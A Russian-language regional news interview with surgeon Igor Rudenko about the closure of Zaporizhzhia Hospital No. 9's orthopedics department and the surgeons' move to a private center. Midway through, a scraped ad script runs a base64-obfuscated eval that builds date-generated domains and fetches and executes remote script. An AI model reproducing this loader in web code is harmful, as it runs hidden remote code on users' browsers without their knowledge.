Ортопедия запорожской 9-ки спустя два года

Прошло два года с момента как в Запорожье закрыли уникальное отделение ортопедии, сорок лет работавшее в городской многопрофильной клинической больнице №9. Закрытие оказалось не только следствием недальновидной политики местной власти, но и совпало с общеукраинской тенденцией, направленной на дальнейшую коммерциализацию медицины и оптимизацию бюджета. В результате закрытия многие медицинские услуги, которые запорожцы получали в отделении, стали для них недоступны. Тем не менее, основной костяк докторов, работавших в ортопедии, удалось сохранить. А значит сохранилась и возможность получить квалифицированное лечение опытных хирургов-ортопедов, на счету которых не один десяток сложных операций, вернувших пациентам радость движения. Сегодня эти специалисты работают на базе медицинского центра «Лекарь», расположенного там же, в 9-й больнице.

— К сожалению, закрытие узкоспециализированных отделений и служб – это общая тенденция, и, на мой взгляд, очень нехорошая. По факту это уничтожение былых достижений, — рассказывает Игорь Руденко, с 1990 года руководивший легендарной ортопедией в запорожской девятке. — В частности, у наших ближайших соседей из Днепра отделение хирургии кисти тоже переведено в статус травматологического, а заведовавший им кандидат медицинских наук ушел на кафедру академии. Судьба остальных врачей мне не известна. Возможно, это оправданно с точки зрения экономии средств — как государственного бюджета, так и местного — но все мы понимаем, что узкий специалист всегда будет делать свою работу лучше, чем её же специалист общего профиля. И это касается не только медицины.

— Раньше, если случалась серьезная травма – например, болгаркой отрезало кисть руки или, скажем, руку затянуло в станок и оказались скальпированы пальцы – такого пациента немедленно доставляли к вам в отделение, и многие, казалось бы, фатальные случаи заканчивались спасением травмированной конечности и восстановлением ее функций. Как обстоит дело теперь? Куда везут таких пациентов?

— Такие тяжелые травмы, к счастью, нечасты, и со времени закрытия ортопедии в 9-й больнице я, во всяком случае, о таких случаях не слышал. Но то, что 5-я больница, в штате которой есть только один сертифицированный по хирургии кисти врач, начала принимать пациентов с травмой и заболеваниями кисти, это точно. Кстати, это врач, ушедший из 9-й при расформировании ортопедии.

— С 1983 года отделению ортопедии, созданному Анатолием Девятовым, учеником и соратником знаменитого ортопеда Г.А. Илизарова, был присвоен статус Межобластного центра восстановительной хирургии костей и суставов, включавшего в сферу своей деятельности пять областей юго-востока Украины и Крым. В 1992 году в структуре отделения была создана служба хирургии и микрохирургии кисти, а в 1997 — региональный центр эндопротезирования – операций по замене суставов имплантами. Что из этих возможностей и в каком объеме удалось сохранить после того, как ортопедию закрыли и ее ведущие специалисты перешли в «Лекарь»?

— Часть сотрудников осталась в новообразованном отделении на 90 коек, которое, насколько я помню, включает в себя 50 коек травматологических, 15 политравмы, 10 хирургии кисти, 10 ортопедических и 5 нейрохирургических. Оставшиеся — это специалисты по хирургии кисти. Как обстоят дела там с другими направлениями нашей деятельности, мне не известно. Но точно знаю, что удлинение конечностей, устранение их деформаций, да и ряд других операций там не выполняется.

— Протезирование тазобедренных и коленных суставов – сложная операция, которая требует высокого профессионализма и немалых средств. Сколько это стоит сегодня для запорожцев в разных клиниках города? И кстати, как обстоит дело с бесплатным эндопротезированием? Эта программа в городе сохранилась?

— В разных клиниках могут быть разные принципы ценообразования и разные источники финансирования, а то, что мы слышим от пациентов, не является официальной информацией. В 2007 году я был основным составителем «Программы по развитию эндопротезирования суставов в г.Запорожье…», которая заработала в 2008-м. К сожалению, со временем она превратилась только в закупку за средства местного бюджета небольшого количества эндопротезов коленного и тазобедренного суставов, и иногда – части необходимых медикаментов и других средств. С марта 2019-го мы, ушедшие из больницы, уже не имеем отношения к этой программе. Могу только констатировать, что в медицинском центре «Лекарь», где мы сейчас работаем, выполняются те же операции, что выполнялись нами и раньше в ортопедическом отделении, — артроскопии, эндопротезирование, остеосинтез при переломах и т.д., причем, в отличие от многих, консультируем мы бесплатно.

var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

— В начале 2019 года, когда стало известно о планах городской власти по закрытию ортопедии в 9-й больнице, на защиту отделения встали десятки ваших пациентов. Такая солидарность людей разного возраста и социального статуса, многие из которых лечились у вас давно, для большинства оказалась полной неожиданностью. Вы поддерживаете с ними связь, помогаете им советом, консультируете их?

— Ну, конечно. Но помогаем мы всем, если это в наших силах, не только вставшим на защиту отделения. Кстати, для многих инициаторов расформирования такая самоорганизация пациентов и просто небезразличных людей оказалась сюрпризом – подозревали в организации этих протестных акций меня, даже проверяли, на работе ли я в это время. Результатом этих протестов стало решение о проведении общественных слушаний, которые запорожская власть назначила через два месяца после расформирования отделения (!). Это абсурд и чистой воды профанация.

И очень странно, что организаторы здравоохранения не нуждаются в специалистах с большим опытом и достаточно высоким профессионализмом. Попробую проиллюстрировать.

С 1991 года при поддержке одной из наших фирм и международной компании «Робот» из Чехословакии я организовал оказание ортопедической помощи их гражданам — у которых, кстати, не было проблем получить ее в странах Европы… Мы оперировали пациентов, которым там либо отказали в помощи ввиду сложности ситуации, либо не смогли оказать ее полноценно. Три-четыре раза в году я там консультировал, отбирая пациентов для лечения в Запорожье. Были общие планы организовать международный центр ортопедии в Баньской Быстрице, где находился недогруженный спинальный центр.

Меня туда звали на высокую должность, но я отказался, поскольку это был период становления областной службы хирургии и микрохирургии кисти, которая по инициативе Александра Семеновича Никоненко была открыта в структуре отделения в 1992 году. Когда Чехословакия разделилась на два государства, идея создания международного центра была отставлена из-за материальных сложностей. А вот пациенты оттуда приезжали к нам на лечение и после. Равно как и граждане из других стран – Ближнего Востока, Европы и даже США.

От других приглашений на работу за рубежом я отказался по той же причине, что и раньше – ортопедическое отделение при полной поддержке исполкома и горздрава продолжало развиваться. В 1997 году в его структуре был организован региональный центр эндопротезирования, и его становление требовало времени и сил — с чем мы успешно и справились.

Я не знаю, у кого из моих коллег есть подобный опыт работы, и, может быть, это также определяет нашу востребованность вне муниципальной медицины.

И несколько слов о сотрудниках. За период руководства отделением мне удалось собрать коллектив, выполнявший сложнейшие задачи, истинных профессионалов, душой болевших за свое дело, людей с большим сердцем. И я благодарен судьбе, что мне довелось с ними работать. Сегодня, к сожалению, только часть из них работает со мной в медицинском центре «Лекарь» — http://ortho-rudenko.com.ua. (adsbygoogle = window.adsbygoogle || []).push({});

Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/ortopediya-zaporozhskoj-9-ki-spustya-dva-goda/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top